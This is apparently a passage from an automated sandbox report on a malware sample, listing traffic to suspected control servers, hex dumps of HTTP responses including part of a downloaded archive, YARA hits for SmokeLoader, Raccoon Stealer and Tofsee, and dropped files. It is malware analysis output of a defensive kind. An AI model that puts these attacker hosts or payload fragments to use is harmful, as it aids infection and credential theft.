63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 4f 0a ad 24 c4 d0 66 b1 78 06 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OTevO$fxP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 42 06 8e 51 de c4 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevBQf#YJ0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 19:30:24 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pieilmtu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: host-data-coin-11.com
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49789 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49807 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49874 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49876 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49890 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49937 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49941 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49945 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 1.1.ECD2MpEBSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.ECD2MpEBSf.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.ECD2MpEBSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.ECD2MpEBSf.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.jgdhbua.6f15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.ECD2MpEBSf.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.1.jgdhbua.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ECD2MpEBSf.exe.5715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.jgdhbua.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.721727855.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.708255964.00000000044C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.776599972.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.899701090.0000000002070000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.721690876.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.901276330.0000000002431000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.776791205.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: BB8A.exe, 0000000C.00000000.765918722.00000000006AA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 00000027.00000003.861803378.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000003.920806858.0000000004E40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.922842020.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.1015911464.0000000004DA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.1024642477.0000000000400000.00000040.00020000.sdmp, type: MEMORY

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 17.3.D936.exe.22d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.svchost.exe.e70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.D936.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.svchost.exe.e70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.krmdinzg.exe.7c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.D936.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.D936.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.7c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000020.00000002.800983655.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.798724710.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.796450954.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.1024071704.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.800731759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.797091655.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.779473426.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.801019606.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: D936.exe PID: 7124, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: krmdinzg.exe PID: 6888, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3000, type: MEMORYSTR

                      System Summary:

                      barindex
                      PE file has nameless sectionsShow sources
                      Source: E3A9.exe.5.drStatic PE information: section name:
                      Source: E3A9.exe.5.drStatic PE information: section name:
                      Source: E3A9.exe.5.drStatic PE information: section name:
                      Source: E3A9.exe.5.drStatic PE information: section name:
                      Source: E3A9.exe.5.drStatic PE information: section name:
                      Source: E3A9.exe.5.drStatic PE information: section name:
                      Source: 9889.exe.5.drStatic PE information: section name:
                      Source: 9889.exe.5.drStatic PE information: section name:
                      Source: 9889.exe.5.drStatic PE information: section name:
                      Source: 9889.exe.5.drStatic PE information: section name:
                      Source: 9889.exe.5.drStatic PE information: section name:
                      Source: 9889.exe.5.drStatic PE information: section name:
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6816 -ip 6816
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_0042B190
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_0042A3B0
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00424D20
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_005731FF
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00573253
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_00402A5F
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_00402AB3
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_1_00402A5F
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_1_00402AB3
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 9_2_006F3253
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 9_2_006F31FF
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_004027CA
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_00401FF1
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_0040158E
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_004015A6
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_004015BC
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_00411065
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_00412A02
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_0040CAC5
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_00410B21
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_004115A9
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_0208160C
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_020815DE
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_020815F6
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00410800
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00411280
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_004103F0
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_004109F0
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00690640
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00690C40
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00690A50
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_006914D0
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_0042B0A0
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_0042A2C0
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00424C30
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_017B96F0
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_017B0470
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_017B0462
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_05811810
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_058153F8
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_05810448
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_05812E48
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_05821528
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_0582AD68
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_05822C88
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_0582A430
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_05824758
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_058208B0
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_058290D3
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_0040C913
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_0042B0A0
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_0042A2C0
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_00424C30
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: ECD2MpEBSf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ECD2MpEBSf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ECD2MpEBSf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ECD2MpEBSf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A332.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A332.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A332.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FB58.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FB58.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FB58.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BB8A.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BB8A.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BB8A.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: CCB2.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: CCB2.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: CCB2.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: CCB2.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6C37.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D936.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D936.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D936.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D936.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D502.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: jgdhbua.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: jgdhbua.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: jgdhbua.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: jgdhbua.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: krmdinzg.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: krmdinzg.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: krmdinzg.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: krmdinzg.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeSection loaded: mscorjit.dll
                      Source: ECD2MpEBSf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\A4DE.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\qeprvgom\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: String function: 0041E100 appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: String function: 022B2794 appears 35 times
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: String function: 00422A90 appears 133 times
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: String function: 0041E210 appears 172 times
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: String function: 0041E100 appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: String function: 004048D0 appears 460 times
